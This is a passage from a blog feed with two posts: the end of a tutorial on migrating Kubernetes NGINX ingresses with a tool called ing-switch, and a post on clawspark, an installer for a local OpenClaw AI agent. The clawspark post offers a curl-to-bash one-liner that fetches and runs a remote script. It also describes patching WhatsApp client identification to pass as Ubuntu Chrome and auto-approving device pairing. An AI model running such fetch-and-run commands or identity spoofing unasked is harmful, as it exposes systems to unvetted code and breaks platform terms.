  --set controller.admissionWebhooks.enabled=false \
  --wait --timeout 120s
</code></pre>
<pre><code class="language-text">NAME: ingress-nginx
LAST DEPLOYED: Sun Mar 29 11:15:57 2026
NAMESPACE: ingress-nginx
STATUS: deployed
</code></pre>
<pre><code class="language-bash">kubectl get pods -n ingress-nginx
</code></pre>
<pre><code class="language-text">NAME                                        READY   STATUS    RESTARTS   AGE
ingress-nginx-controller-5486dbd97f-vc9wv   1/1     Running   0          54s
</code></pre>
<h3>Step 3: Deploy 3 Apps with NGINX Annotations</h3>
<p>We deploy three services, each with different annotation patterns:</p>
<p><strong>App 1 -- Basic web app</strong> (SSL redirect + timeouts):</p>
<pre><code class="language-yaml">apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: web-app
  namespace: demo
  annotations:
    nginx.ingress.kubernetes.io/ssl-redirect: "true"
    nginx.ingress.kubernetes.io/proxy-read-timeout: "60"
    nginx.ingress.kubernetes.io/proxy-connect-timeout: "10"
spec:
  ingressClassName: nginx
  rules:
  - host: web.example.com
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: web-app
            port:
              number: 80
</code></pre>
<p><strong>App 2 -- API with CORS + rate limiting</strong> (10 annotations):</p>
<pre><code class="language-yaml">apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: api-cors
  namespace: demo
  annotations:
    nginx.ingress.kubernetes.io/force-ssl-redirect: "true"
    nginx.ingress.kubernetes.io/enable-cors: "true"
    nginx.ingress.kubernetes.io/cors-allow-origin: "https://app.example.com,https://admin.example.com"
    nginx.ingress.kubernetes.io/cors-allow-methods: "GET, POST, PUT, DELETE, OPTIONS"
    nginx.ingress.kubernetes.io/cors-allow-headers: "Content-Type, Authorization, X-API-Key"
    nginx.ingress.kubernetes.io/cors-allow-credentials: "true"
    nginx.ingress.kubernetes.io/cors-max-age: "86400"
    nginx.ingress.kubernetes.io/limit-rps: "50"
    nginx.ingress.kubernetes.io/limit-burst-multiplier: "3"
    nginx.ingress.kubernetes.io/proxy-body-size: "5m"
spec:
  ingressClassName: nginx
  rules:
  - host: api.example.com
    http:
      paths:
      - path: /v1
        pathType: Prefix
        backend:
          service:
            name: api-service
            port:
              number: 80
</code></pre>
<p><strong>App 3 -- Auth-protected dashboard</strong> (external auth + IP allowlist + session affinity):</p>
<pre><code class="language-yaml">apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: dashboard
  namespace: demo
  annotations:
    nginx.ingress.kubernetes.io/ssl-redirect: "true"
    nginx.ingress.kubernetes.io/auth-url: "https://auth.example.com/verify"
    nginx.ingress.kubernetes.io/auth-response-headers: "X-User-ID,X-User-Email"
    nginx.ingress.kubernetes.io/whitelist-source-range: "10.0.0.0/8,172.16.0.0/12"
    nginx.ingress.kubernetes.io/affinity: "cookie"
    nginx.ingress.kubernetes.io/session-cookie-name: "dashboard-session"
    nginx.ingress.kubernetes.io/session-cookie-max-age: "3600"
spec:
  ingressClassName: nginx
  rules:
  - host: dashboard.example.com
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: dashboard
            port:
              number: 80
</code></pre>
<p>After applying all three:</p>
<pre><code class="language-bash">kubectl get ingress -n demo
</code></pre>
<pre><code class="language-text">NAME        CLASS   HOSTS                   ADDRESS   PORTS   AGE
api-cors    nginx   api.example.com                   80      5s
dashboard   nginx   dashboard.example.com             80      5s
web-app     nginx   web.example.com                   80      5s
</code></pre>
<pre><code class="language-bash">kubectl get pods -n demo
</code></pre>
<pre><code class="language-text">NAME                           READY   STATUS    RESTARTS   AGE
api-service-5f99b6d99d-x7vmn   1/1     Running   0          24s
dashboard-9ddbf867-7dbgf       1/1     Running   0          24s
web-app-969c76b7c-7wqw5        1/1     Running   0          24s
</code></pre>
<p>3 ingresses, 20 NGINX annotations, 3 services running. Now let's see what ing-switch makes of this.</p>
<h3>Step 4: Scan the Cluster</h3>
<pre><code class="language-bash">ing-switch scan
</code></pre>
<pre><code class="language-text">  ing-switch -- Cluster Scan Results
  Cluster: vcluster-docker_demo

  Ingress Controller Detected
  Type:      ingress-nginx
  Version:   unknown
  Namespace: ingress-nginx

  Found 3 Ingress resource(s)

  NAMESPACE   NAME        HOSTS                   ANNOTATIONS   TLS   COMPLEXITY
  ---------   ----        -----                   -----------   ---   ----------
  demo        api-cors    api.example.com         10            no    unsupported
  demo        dashboard   dashboard.example.com   7             no    complex
  demo        web-app     web.example.com         3             no    complex
</code></pre>
<p>ing-switch detected the NGINX controller and found all 3 ingresses with their annotation counts and complexity scores.</p>
<h3>Step 5: Analyze Compatibility</h3>
<p>Let's compare all three targets:</p>
<p><strong>Traefik v3:</strong></p>
<pre><code class="language-bash">ing-switch analyze --target traefik
</code></pre>
<pre><code class="language-text">  Summary
  -------
  Total ingresses:      3
  Fully compatible:     1
  Needs workarounds:    2
  Has unsupported:      0
</code></pre>
<p><strong>Gateway API (Envoy):</strong></p>
<pre><code class="language-bash">ing-switch analyze --target gateway-api
</code></pre>
<pre><code class="language-text">  Summary
  -------
  Total ingresses:      3
  Fully compatible:     0
  Needs workarounds:    3
  Has unsupported:      0
</code></pre>
<p><strong>Gateway API (Traefik):</strong></p>
<pre><code class="language-bash">ing-switch analyze --target gateway-api-traefik
</code></pre>
<pre><code class="language-text">  Summary
  -------
  Total ingresses:      3
  Fully compatible:     0
  Needs workarounds:    3
  Has unsupported:      0
</code></pre>
<p>Key insight: <strong>Traefik is the highest-compatibility target</strong> for this workload (1 fully compatible out of 3). The CORS annotations map directly to Traefik's Headers middleware. For Gateway API, CORS is now also fully supported thanks to the native CORS filter in Gateway API v1.5.</p>
<p>Here's the detailed annotation mapping for the API with CORS:</p>
<pre><code class="language-text">  demo/api-cors
  -------------
  ANNOTATION               STATUS        TARGET RESOURCE                    NOTES
  enable-cors              [supported]   HTTPRoute (CORS filter)            Native CORS filter (GA in Gateway API v1.5)
  cors-allow-origin        [supported]   HTTPRoute (CORS filter)            allowOrigins in CORS filter
  cors-allow-methods       [supported]   HTTPRoute (CORS filter)            allowMethods in CORS filter
  cors-allow-headers       [supported]   HTTPRoute (CORS filter)            allowHeaders in CORS filter
  cors-allow-credentials   [supported]   HTTPRoute (CORS filter)            allowCredentials in CORS filter
  cors-max-age             [supported]   HTTPRoute (CORS filter)            maxAge in CORS filter
  force-ssl-redirect       [supported]   HTTPRoute (RequestRedirect filter) 301 redirect to HTTPS
  limit-rps                [partial]     BackendTrafficPolicy (RateLimit)   Envoy Gateway BackendTrafficPolicy
  limit-burst-multiplier   [partial]     BackendTrafficPolicy (RateLimit)   Burst configurable but uses tokens
  proxy-body-size          [partial]     BackendTrafficPolicy               requestBuffer.limit
</code></pre>
<p>7 out of 10 annotations are fully supported. The 3 "partial" ones work -- they just use a slightly different API.</p>
<h3>Step 6: Generate Migration Files</h3>
<pre><code class="language-bash">ing-switch migrate --target gateway-api-traefik --output-dir ./migration
</code></pre>
<pre><code class="language-text">  ing-switch -- Generating Migration Files
  Target:     gateway-api-traefik
  Output dir: ./migration

  + 00-migration-report.md
  + 01-install-gateway-api-crds/install.sh
  + 02-install-traefik-gateway/helm-install.sh
  + 02-install-traefik-gateway/values.yaml
  + 03-gateway/gatewayclass.yaml
  + 03-gateway/gateway.yaml
  + 04-httproutes/demo-api-cors.yaml
  + 04-httproutes/demo-dashboard.yaml
  + 04-httproutes/demo-web-app.yaml
  + 05-policies/demo-api-cors-ratelimit.yaml
  + 05-policies/demo-dashboard-forwardauth.yaml
  + 05-policies/demo-dashboard-ipallowlist.yaml
  + 06-verify.sh
  + 07-cleanup/remove-nginx.sh
  Generated 13 files in ./migration/
</code></pre>
<h3>Step 7: Inspect the Generated YAML</h3>
<p><strong>GatewayClass -- points to Traefik, not Envoy:</strong></p>
<pre><code class="language-yaml">apiVersion: gateway.networking.k8s.io/v1
kind: GatewayClass
metadata:
  name: traefik
spec:
  controllerName: traefik.io/gateway-controller
</code></pre>
<p><strong>HTTPRoute with native CORS filter</strong> (no more ResponseHeaderModifier hacks):</p>
<pre><code class="language-yaml">apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  name: api-cors
  namespace: demo
spec:
  parentRefs:
  - name: ing-switch-gateway
    namespace: default
  hostnames:
  - "api.example.com"
  rules:
  - matches:
    - path:
        type: PathPrefix
        value: "/v1"
    filters:
    - type: CORS
      cors:
        allowOrigins:
        - type: Exact
          value: "https://app.example.com"
        - type: Exact
          value: "https://admin.example.com"
        allowMethods:
        - "GET"
        - "POST"
        - "PUT"
        - "DELETE"
        - "OPTIONS"
        allowHeaders:
        - "Content-Type"
        - "Authorization"
        - "X-API-Key"
        allowCredentials: true
        maxAge: "86400s"
    backendRefs:
    - name: api-service
      port: 80
</code></pre>
<p><strong>Traefik Middleware CRDs</strong> (not Envoy-specific policies):</p>
<pre><code class="language-yaml"># Rate Limiting
apiVersion: traefik.io/v1alpha1
kind: Middleware
metadata:
  name: demo-api-cors-ratelimit
  namespace: demo
spec:
  rateLimit:
    average: 50
    burst: 3
</code></pre>
<pre><code class="language-yaml"># ForwardAuth (external authentication)
apiVersion: traefik.io/v1alpha1
kind: Middleware
metadata:
  name: demo-dashboard-forwardauth
  namespace: demo
spec:
  forwardAuth:
    address: "https://auth.example.com/verify"
  authResponseHeaders:
    - "X-User-ID"
    - "X-User-Email"
</code></pre>
<pre><code class="language-yaml"># IP AllowList
apiVersion: traefik.io/v1alpha1
kind: Middleware
metadata:
  name: demo-dashboard-ipallowlist
  namespace: demo
spec:
  ipAllowList:
    sourceRange:
    - "10.0.0.0/8"
    - "172.16.0.0/12"
</code></pre>
<h3>Step 8: Review the Migration Report</h3>
<p>The <code>migrate</code> command automatically generates <code>00-migration-report.md</code> in the output directory. Open it to see the full summary:</p>
<pre><code class="language-bash">cat ./migration/00-migration-report.md
</code></pre>
<pre><code class="language-markdown"># ing-switch Migration Report
**Target Controller:** gateway-api-traefik

## Summary
| Metric | Count |
|--------|-------|
| Total Ingresses | 3 |
| Fully Compatible | 0 |
| Needs Workarounds | 3 |
| Has Unsupported Annotations | 0 |

## demo/api-cors -- Needs workaround
| Annotation | Status | Target Resource | Notes |
|-----------|--------|-----------------|-------|
| enable-cors | OK | HTTPRoute (CORS filter) | Native CORS filter (GA in v1.5) |
| cors-allow-origin | OK | HTTPRoute (CORS filter) | allowOrigins in CORS filter |
| limit-rps | WARN | BackendTrafficPolicy | Envoy Gateway BackendTrafficPolicy |
...
</code></pre>
<h3>Step 9: Apply (Dry-Run First)</h3>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/b4c92aec-3c11-41e4-84da-bce1b3891573.png" alt="" style="display:block;margin:0 auto" />

<pre><code class="language-bash"># Install Gateway API CRDs
bash ./migration/01-install-gateway-api-crds/install.sh

# Install Traefik with Gateway API provider
bash ./migration/02-install-traefik-gateway/helm-install.sh

# Dry-run all resources first
kubectl apply -f ./migration/03-gateway/ --dry-run=server
kubectl apply -f ./migration/04-httproutes/ --dry-run=server

# If dry-run passes, apply for real
kubectl apply -f ./migration/03-gateway/
kubectl apply -f ./migration/04-httproutes/
kubectl apply -f ./migration/05-policies/
</code></pre>
<p>At this point, <strong>both NGINX and Traefik are running side by side</strong>. DNS still points to NGINX. Production traffic is untouched.</p>
<h3>Step 10: Verify and Cutover</h3>
<pre><code class="language-bash"># Run the generated verification script
bash ./migration/06-verify.sh

# Once verified, update DNS to Traefik's IP
# Then clean up NGINX
bash ./migration/07-cleanup/remove-nginx.sh
</code></pre>
<h3>Step 11: Use the Web UI</h3>
<p>For teams that prefer a visual workflow:</p>
<pre><code class="language-bash">ing-switch ui
# Opens http://localhost:8080
</code></pre>
<p>The dashboard provides four pages:</p>
<p><strong>Detect</strong> -- Scan your cluster and see all ingresses with annotation counts and complexity:</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/609e59ce-ab2a-40ac-8aa9-a864ad9be8e6.png" alt="" style="display:block;margin:0 auto" />

<p><strong>Analyze</strong> -- Choose between 3 targets and see the full annotation compatibility matrix:</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/c6fa8d3a-1723-4e8f-bf54-f32d823ccf91.png" alt="" style="display:block;margin:0 auto" />

<p><strong>Migrate</strong> -- One-click generation with step-by-step checklist and dry-run buttons:</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/344c9635-82e2-430e-aee4-7d1595bf96a7.png" alt="" style="display:block;margin:0 auto" />

<p>View all generated files inline with syntax highlighting:</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/0b3a75b4-5b82-4d70-b340-7cf0ba784f63.png" alt="" style="display:block;margin:0 auto" />

<p>See migration gaps with impact ratings and fix instructions:</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/4b9e6053-3d6e-42ba-896a-44b3727e8349.png" alt="" style="display:block;margin:0 auto" />

<p><strong>Validate</strong> -- Run live cluster checks to confirm your migration phase:</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/f64e5599-45ac-490a-a6fd-757f9fda13ad.png" alt="" style="display:block;margin:0 auto" />

<h3>Cleanup</h3>
<pre><code class="language-bash">vcluster delete demo --driver docker
</code></pre>
<pre><code class="language-plaintext">done  Successfully deleted virtual cluster demo
</code></pre>
<h2>What Makes ing-switch Different</h2>
<table>
<thead>
<tr>
<th>Feature</th>
<th>ing-switch</th>
<th>ingress2gateway</th>
<th>Manual</th>
</tr>
</thead>
<tbody><tr>
<td>Annotation coverage</td>
<td>119</td>
<td>30+</td>
<td>You count</td>
</tr>
<tr>
<td>Traefik Ingress target</td>
<td>Yes</td>
<td>No</td>
<td>--</td>
</tr>
<tr>
<td>Gateway API (Traefik)</td>
<td>Yes</td>
<td>No</td>
<td>--</td>
</tr>
<tr>
<td>Gateway API (Envoy)</td>
<td>Yes</td>
<td>Yes</td>
<td>--</td>
</tr>
<tr>
<td>Impact ratings</td>
<td>Yes</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td>Web UI</td>
<td>Yes</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td>Install scripts</td>
<td>Yes</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td>Verification scripts</td>
<td>Yes</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td>DNS migration guide</td>
<td>Yes</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td>Dry-run mode</td>
<td>Yes</td>
<td>No</td>
<td>--</td>
</tr>
</tbody></table>
<h2>The Ecosystem Is Ready</h2>
<ul>
<li><p><strong>Gateway API v1.5</strong> -- CORS filter, TLSRoute, BackendTLSPolicy all GA</p>
</li>
<li><p><strong>ingress2gateway v1.0</strong> -- Official tool with emitter architecture</p>
</li>
<li><p><strong>Traefik v3.7</strong> -- Native NGINX annotation provider (80+ annotations)</p>
</li>
<li><p><strong>Envoy Gateway v1.7</strong> -- XListenerSet, enhanced policies</p>
</li>
<li><p><strong>cert-manager v1.20</strong> -- Gateway API ListenerSet support</p>
</li>
<li><p><strong>Kubernetes 1.36</strong> -- Ships April 22, first release post-NGINX archival</p>
</li>
</ul>
<p>The tools exist. The standards are stable. The only thing left is to actually run the migration.</p>
<hr />
<p><strong>Star it, fork it, migrate today:</strong> <a href="https://github.com/saiyam1814/ing-switch">github.com/saiyam1814/ing-switch</a></p>
<p><em>ing-switch is open source under the MIT license. PRs welcome.</em></p>
]]></content:encoded></item><item><title><![CDATA[clawspark: Your Private OpenClaw AI Assistant That Never Phones Home]]></title><description><![CDATA[By Saiyam Pathak

OpenClaw has 314,000+ GitHub stars. It is the most popular open-source AI agent out there. It connects to WhatsApp and Telegram, does deep research, manages files, writes code, handl]]></description><link>https://blog.kubesimplify.com/clawspark-your-private-openclaw-ai-assistant-that-never-phones-home</link><guid isPermaLink="true">https://blog.kubesimplify.com/clawspark-your-private-openclaw-ai-assistant-that-never-phones-home</guid><category><![CDATA[ai-agent]]></category><category><![CDATA[ollama]]></category><category><![CDATA[openclaw]]></category><category><![CDATA[clawspark]]></category><category><![CDATA[AI Assistants ]]></category><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Sun, 15 Mar 2026 15:37:37 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/fc9a8e16-4bcb-4bc8-a01e-46daf8c3fb7c.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><em>By Saiyam Pathak</em></p>
<hr />
<p>OpenClaw has 314,000+ GitHub stars. It is the most popular open-source AI agent out there. It connects to WhatsApp and Telegram, does deep research, manages files, writes code, handles voice notes, and genuinely works as a personal assistant. The catch is that setting it up with a local LLM on NVIDIA hardware is a long process with security in place.</p>
<p>I spent some time getting it right on a DGX Spark. Then I automated the entire thing into one command. Along the way I found nine bugs, wrote three source patches, fought Ubuntu's managed Python, debugged WhatsApp's device linking protocol, and integrated a hardware-aware model selection engine. This is the full story.</p>
<h2>The Problem</h2>
<p>NVIDIA's DGX Spark is a desktop AI supercomputer. GB10 Grace Blackwell chip, 128GB unified memory, 1 PFLOP of AI compute, 20-core ARM Cortex-A725 CPU. It sits on your desk, runs quietly, and has enough memory to load models that actually compete with cloud APIs. The hardware is not the bottleneck anymore.</p>
<p>The bottleneck is setup. If you want to run OpenClaw with a local model on DGX Spark, here is what you need to do manually:</p>
<ol>
<li><p>Install Node.js 22+</p>
</li>
<li><p>Install OpenClaw via npm</p>
</li>
<li><p>Install Ollama</p>
</li>
<li><p>Figure out which model fits your hardware (there are hundreds)</p>
</li>
<li><p>Pull the model (can be 20-80GB)</p>
</li>
<li><p>Configure OpenClaw to point at your local Ollama instance</p>
</li>
<li><p>Set the correct environment variables (OLLAMA_API_KEY, OLLAMA_BASE_URL)</p>
</li>
<li><p>Run onboard, which sets half your config to wrong defaults</p>
</li>
<li><p>Fix tools.profile from "messaging" to "full"</p>
</li>
<li><p>Start the gateway, then start a separate Node Host process</p>
</li>
<li><p>Pair the Node Host to the gateway</p>
</li>
<li><p>Link WhatsApp via QR code</p>
</li>
<li><p>Patch three different JavaScript files in OpenClaw's dist folder</p>
</li>
<li><p>Install skills</p>
</li>
<li><p>Harden security</p>
</li>
<li><p>Set up voice transcription</p>
</li>
</ol>
<p>Miss one step and things fail silently. The gateway starts, the model loads, but your agent can only send text messages because it has 5 tools instead of 15. Or WhatsApp linking fails because the browser identification string gets rejected. Or group messages never arrive because history sync is disabled.</p>
<p>NVIDIA's own docs at build.nvidia.com recommend gpt-oss-120b for DGX Spark and describe a manual multi-step process using Ollama or LM Studio. Their guide covers the inference setup but not WhatsApp integration, not voice transcription, not security hardening, and not the Node Host that the agent actually needs to do useful work. clawspark automates all of this, including the parts NVIDIA's guide does not cover.</p>
<h2>What clawspark Does</h2>
<p>One command:</p>
<pre><code class="language-bash">curl -fsSL https://clawspark.dev/install.sh | bash
</code></pre>
<p>That is it. The installer runs 14 steps. It detects your hardware, recommends a model, asks a few questions, then installs and configures everything. Here is the full flow:</p>
<p><strong>Step 1-2: Hardware detection.</strong> The script probes your GPU via nvidia-smi, reads DMI product name for DGX Spark identification, checks for Tegra signatures on Jetson, and measures total system memory. It classifies your hardware into one of four tiers: DGX Spark (128GB unified), Jetson AGX (64GB), RTX high-end (24GB+ VRAM), or RTX standard (8-24GB).</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/e77d09be-44ed-4a07-9856-f6a8798020e3.jpg" alt="" style="display:block;margin:0 auto" />

<p><strong>Step 3: Model selection.</strong> This is where it gets interesting. For DGX Spark, I curated a list of 5 models ranked by <a href="https://github.com/AlexsJones/llmfit">llmfit</a> score and verified on real hardware:</p>
<table>
<thead>
<tr>
<th>Model</th>
<th>Size</th>
<th>Estimated tok/s</th>
<th>llmfit Score</th>
<th>Use Case</th>
</tr>
</thead>
<tbody><tr>
<td>qwen3.5:35b-a3b (default)</td>
<td>18 GB</td>
<td>~59 (measured)</td>
<td>91.8</td>
<td>General purpose</td>
</tr>
<tr>
<td>qwen3.5:122b-a10b</td>
<td>33 GB</td>
<td>~45</td>
<td>95.5</td>
<td>Best quality MoE</td>
</tr>
<tr>
<td>qwen3-coder-next</td>
<td>52 GB</td>
<td>~109</td>
<td>93.6</td>
<td>Coding/agentic</td>
</tr>
<tr>
<td>qwen3-next</td>
<td>50 GB</td>
<td>~59</td>
<td>92.2</td>
<td>Chat/instruct</td>
</tr>
<tr>
<td>qwen3-coder:30b</td>
<td>19 GB</td>
<td>~58</td>
<td>94.1</td>
<td>Coding lightweight</td>
</tr>
</tbody></table>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/81931dba-337d-49ee-9b44-5548d4b2878b.jpg" alt="" style="display:block;margin:0 auto" />

<p>For non-DGX-Spark hardware (RTX, Jetson, anything else), the installer uses llmfit to analyze your specific hardware, score hundreds of models, map the results to Ollama model IDs, verify each candidate actually exists on the Ollama library, and present the top 5 that fit. No hardcoded lists. Your GPU, your recommendations.</p>
<p><strong>Step 4-5: Deployment and messaging.</strong> Choose local-only or hybrid (cloud fallback). Choose WhatsApp, Telegram, both, or skip messaging entirely. The web UI at <code>/__openclaw__/canvas/</code> always works regardless.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/a20d26e8-5507-47a6-ad86-57907be5f1c5.jpg" alt="" style="display:block;margin:0 auto" />

<p><strong>Step 6-14: The actual installation.</strong> Ollama install and model pull. Node.js 22 if needed. OpenClaw npm install. Config generation with correct Ollama endpoints. Onboard with overrides for all the wrong defaults. Three source patches (more on these below). Skills installation. Whisper voice setup. WhatsApp QR linking. Optional Tailscale for remote access. ClawMetry dashboard. Security hardening. Final verification.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/0b947b8a-fcac-424e-ba52-80b87f58a13d.jpg" alt="" style="display:block;margin:0 auto" />

<p>After installation, you get the <code>clawspark</code> CLI tool for day-to-day management: <code>clawspark status</code>, <code>clawspark benchmark</code>, <code>clawspark restart</code>, <code>clawspark skills sync</code>, <code>clawspark airgap on/off</code>, and more.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/283cd367-ff8f-4357-a604-88bc1c315ffd.jpg" alt="" style="display:block;margin:0 auto" />

<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/ea479d57-267c-4d78-ab36-cea2e3e9ebec.jpg" alt="" style="display:block;margin:0 auto" />

<h2>The Architecture</h2>
<p>Here is how the pieces fit together once everything is running:</p>
<pre><code class="language-plaintext">WhatsApp / Telegram / Web UI (Canvas)
              |
    OpenClaw Gateway (port 18789)
     |            |            |
   Agent      Node Host     Baileys
   (LLM)      (Tools)      (WhatsApp Web)
     |            |
   Ollama      15 tools:
  (port 11434)  exec, read, write, edit,
     |          web_fetch, message, canvas,
   Model        process, cron, nodes,
   (GPU)        sessions_spawn, vision,
                transcribe, memory_search,
                memory_store
</code></pre>
<p>The Gateway is the central process. It manages the agent, routes messages from WhatsApp/Telegram/Web, and coordinates tool calls. The Agent is the LLM reasoning loop that decides what to do. The Node Host is a separate process that provides the actual tool implementations -- reading files, fetching web pages, executing code. Without the Node Host, the agent has only 5 basic messaging tools instead of the full 15.</p>
<p>Baileys is the WhatsApp Web client library that OpenClaw uses under the hood. It connects to WhatsApp's servers using a linked device session, the same way WhatsApp Web works in your browser. Messages flow from WhatsApp through Baileys to the Gateway, which sends them to the Agent, which calls tools on the Node Host, and the response flows back the same way.</p>
<h2><strong>The Bugs I Found and Fixed</strong></h2>
<p>This section is the reason I wrote this post. These are all real issues I hit on real hardware, and some of them took hours to diagnose. If you are setting up OpenClaw manually, this list might save you a lot of time.</p>
<h3><strong>1. tools.profile does not default to "full"</strong></h3>
<p>When you run <code>openclaw onboard</code>, it does not set <code>tools.profile</code> to "full". In v2026.3.2 it defaulted to "messaging" (5 tools only). This was partially fixed in v2026.3.7, which changed the default to "coding" -- better, but still missing tools like exec, process, cron, and nodes. The agent looks like it is working, but it cannot do everything it should.</p>
<p>The fix: <code>openclaw config set tools.profile full</code> after onboard completes. clawspark does this automatically.</p>
<h3><strong>2. Node Host is required but not documented</strong></h3>
<p>The Gateway alone does not provide execution tools. You need a separate "Node Host" process (<code>openclaw node run</code>) that connects to the Gateway and provides filesystem, browser, and execution capabilities. Without it, even with <code>tools.profile full</code>, the agent has no tools to call. The Node Host also needs to be paired with the Gateway (device approval), which is another step that is easy to miss.</p>
<p>clawspark starts the Node Host, detects pending pairing requests, auto-approves them, and restarts the Node Host with the pairing token.</p>
<h3><strong>3. Baileys browser string rejected by WhatsApp</strong></h3>
<p>OpenClaw's WhatsApp integration uses Baileys, which identifies itself as <code>["openclaw", "cli", VERSION]</code> to WhatsApp's servers. WhatsApp rejects this during device linking. The QR code scan works, but the connection fails silently.</p>
<p>The fix is a source patch: replace the browser identification with <code>["Ubuntu", "Chrome", "22.0"]</code>, which WhatsApp accepts. This requires patching the compiled JavaScript in OpenClaw's dist folder. clawspark finds the relevant session files and applies the patch automatically.</p>
<h3><strong>4. web_search requires a Brave API key</strong></h3>
<p>OpenClaw's built-in web_search tool requires a Brave Search API key. For a local setup, requiring an external API key defeats the purpose. clawspark works around this by configuring the agent's <a href="http://TOOLS.md">TOOLS.md</a> to use DuckDuckGo Lite via web_fetch instead:</p>
<pre><code class="language-plaintext">web_fetch with url="https://lite.duckduckgo.com/lite/?q=YOUR+QUERY"
</code></pre>
<p>This gives the agent web search capabilities without any API keys or external dependencies.</p>
<h3><strong>5. Agent narrates tool usage on WhatsApp</strong></h3>
<p>When you ask the agent a question on WhatsApp, it sends messages like "Let me search for that..." and "The search returned these results..." before giving you the actual answer. On WhatsApp, this means three or four notification buzzes for one question.</p>
<p>The fix is <a href="http://SOUL.md">SOUL.md</a> rules: explicit instructions to never narrate tool usage, use tools silently, and respond with one clean message.</p>
<h3><strong>6. syncFullHistory breaks group messages</strong></h3>
<p>OpenClaw defaults to <code>syncFullHistory: false</code> in its Baileys configuration. This means after a fresh WhatsApp link, Baileys never receives group sender keys. The result: groups are completely silent. No messages arrive, no errors are logged. It just looks like nobody is talking.</p>
<p>The fix: patch <code>syncFullHistory: false</code> to <code>syncFullHistory: true</code> in the compiled session files. clawspark finds and patches all relevant files automatically.</p>
<h3><strong>7. Mention detection has an early return that blocks text @mentions</strong></h3>
<p>OpenClaw's mention detection in group chats has a <code>return false</code> early exit when JID (WhatsApp ID) mentions exist but do not match the bot's JID. The problem is that WhatsApp resolves @mentions to JIDs, and sometimes the resolved JID does not match the bot's linked phone JID. The early return prevents the text-pattern fallback from ever running, so typing @botname in a group never triggers the bot.</p>
<p>The fix: remove the <code>return false</code> line so the text-pattern fallback always has a chance to match. Another source patch to the compiled JavaScript.</p>
<h3><strong>8. Systemd service missing Ollama environment variables</strong></h3>
<p>When OpenClaw's gateway runs as a systemd service, it does not inherit the shell environment. The OLLAMA_API_KEY and OLLAMA_BASE_URL variables are missing, so the gateway cannot reach Ollama. The model appears to load, but every inference call fails.</p>
<p>clawspark writes the environment variables to a gateway.env file, adds them to the user's shell profile (.bashrc or .zshrc), and sources them before starting any OpenClaw process.</p>
<h3><strong>9. OpenClaw bindings schema changed between versions</strong></h3>
<p>This one cost me an entire evening. Earlier versions of OpenClaw supported a <code>bindings</code> config for routing different message sources to different agents (e.g., full tools in DMs, restricted tools in groups). Starting with v2026.3.2, the bindings schema changed and the old format causes a validation error at startup: <code>Invalid config: bindings.0: Invalid input</code>. This is not a bug per se -- the schema evolved -- but any guide or config from earlier versions will break silently.</p>
<p>The fix: remove bindings entirely and use a single agent with context-aware rules. <a href="http://SOUL.md">SOUL.md</a> and <a href="http://TOOLS.md">TOOLS.md</a> contain explicit sections for DM context (full tools) and group context (Q&amp;A only). The agent enforces the boundary at the prompt level. Groups also use <code>requireMention: true</code> and <code>groupPolicy: open</code> at the config level so the bot only responds when @mentioned.</p>
<h2>Security</h2>
<p>Running a local AI agent is not automatically secure. clawspark applies multiple layers:</p>
<p><strong>Gateway binding.</strong> The OpenClaw gateway binds to localhost only. It is not accessible from other machines on your network unless you explicitly set up Tailscale.</p>
<p><strong>Firewall rules.</strong> UFW is configured to deny all incoming connections except SSH. Outgoing traffic is allowed by default, or blocked entirely in air-gap mode.</p>
<p><strong>Token authentication.</strong> A random 256-bit token is generated during installation. Only clients with this token can talk to the gateway API.</p>
<p><strong>Context-aware tool restrictions.</strong> In direct messages, the owner gets full access to all 15 tools. In group chats, the agent restricts itself to Q&amp;A only (message, web_fetch, memory). This is enforced at the prompt level via SOUL.md, which contains explicit rules for each context. Groups also require @mention to activate.</p>
<p><strong>SOUL.md and TOOLS.md.</strong> These workspace files contain the agent's identity, capabilities, and absolute rules. No credential disclosure (applies to all users, including the owner). No system information in groups. No self-modification. Both files are set to chmod 444 (read-only) so the agent cannot edit its own rules.</p>
<p><strong>Air-gap mode.</strong> For maximum isolation, <code>clawspark airgap on</code> blocks all outbound internet traffic via UFW. Only local network and loopback traffic is allowed. The model, the agent, and all tools run entirely offline.</p>
<p>One honest caveat: local models do not have the same safety filters that cloud providers build into their APIs. That is both a feature (no arbitrary refusals) and a responsibility. You should think carefully about who has access to message your bot.</p>
<h2>Real Performance Numbers</h2>
<p>All numbers below are from an actual DGX Spark running Linux 6.14.0-1015-nvidia (arm64), Ollama 0.17.7, Node.js v22.22.1, OpenClaw v2026.3.13, with Qwen 3.5 35B-A3B:</p>
<table>
<thead>
<tr>
<th>Metric</th>
<th>Value</th>
</tr>
</thead>
<tbody><tr>
<td>Cold model load (first query)</td>
<td>~41 seconds</td>
</tr>
<tr>
